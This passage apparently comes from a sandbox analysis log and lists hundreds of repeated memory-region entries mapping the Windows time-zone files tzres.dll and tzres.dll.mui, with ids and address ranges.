region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3442
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3443
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3444
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3445
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3446
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3447
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3448
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3449
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3450
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3451
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3452
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3453
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3454
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3455
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3456
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3457
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3458
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3459
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3460
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3461
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3462
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3463
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3464
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3465
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3466
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3467
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3468
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3469
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3470
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3471
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3472
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3473
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3474
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3475
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3476
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3477
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3478
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3479
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3480
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3481
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3482
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3483
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3484
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3485
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3486
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3487
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3488
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3489
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3490
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3491
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3492
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3493
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3494
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3495
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3496
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3497
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3498
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3499
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3500
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3501
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3502
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3503
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3504
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3505
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3506
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3507
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3508
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3509
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3510
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3511
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3513
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3514
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3515
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3516
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3517
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3518
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3519
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3520
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3521
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3522
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3523
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3524
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3525
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3526
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3527
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3528
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3529
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3530
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3531
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3532
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3533
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3534
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3535
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3536
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3537
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3538
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3539
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3540
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3541
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3542
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3543
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3544
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3545
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3546
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3547
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3548
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3549
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3550
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3551
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3552
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3553
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3554
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3555
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3556
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3557
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3558
start_va = 0xab0000
